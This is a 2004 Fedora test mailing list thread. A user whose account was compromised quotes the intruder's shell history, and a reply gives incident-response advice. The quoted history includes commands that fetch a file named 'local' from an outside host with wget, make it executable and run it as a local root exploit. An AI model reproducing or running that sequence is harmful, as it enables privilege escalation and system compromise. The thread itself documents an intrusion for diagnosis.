Vulnerability on FC3T2 ? Present in FC3 ?

Aaron Scott scott.aaron at abc.net.au
Mon Nov 22 04:57:23 UTC 2004 

I really should add as well that the exploit mentioned is a local
exploit.  You need to be on the machine first as a local user before you
can execute it.  Maybe check the non-root user histories as well.  Maybe
some one has pinched your password.


On Mon, 2004-11-22 at 15:51 +1100, Aaron Scott wrote:

> And how does this prove that there is a vulnerability in fedora and
> not that you have poor securty?
> 
> According to the URL's you post some one has installed a root kit.
> Unlucky.  But they had to get it there first.
> 
> You should first discover how they got onto your machine.  You will
> need to check a lot more logs than just wtemp.  Try secure and
> messages as well.  Maybe some one guessed your password.  I really
> hope that you have firewalled that ip range out to help prevent
> further trouble from that IP range ( assuming though the hacker isn't
> bouncing from comprimised machine to comprimised machine ).  Also, you
> might want to consider who has had or might have had physical access
> to your machine ( if that is possible ).
> 
> Pointing the finger at Fedora with out real proof is pointless.
> 
> 
> On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote: 
> 
> > Someone logged into my system on 13 Nov 2004
> > I found the following in /var/log/wtmp
> > 
> > 207-36-180-20.prt.primarydns.com
> > demo.allegientsystems.com
> > 
> > My user password was changed - but not the root password - and the 
> > following commands had been executed:-
> > 
> > w
> > uname -a
> > cat /etc/issue
> > cd /tmp
> > wget chebeleu.com/local
> > chmod +x local
> > ./local -d -r
> > ./local -d -r
> > lunx
> > lynx
> > 
> > There is a similar report dated 10-Nov-2004 at 
> > http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
> > where someone suggested it might be the exploit at 
> > http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
> > 
> > Anybody know any more ?
> > 
> 
> -- 
> fedora-test-list mailing list
> fedora-test-list at redhat.com
> To unsubscribe: 
> http://www.redhat.com/mailman/listinfo/fedora-test-list
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://listman.redhat.com/archives/fedora-test-list/attachments/20041122/8a8569c7/attachment.htm>

More information about the fedora-test-list mailing list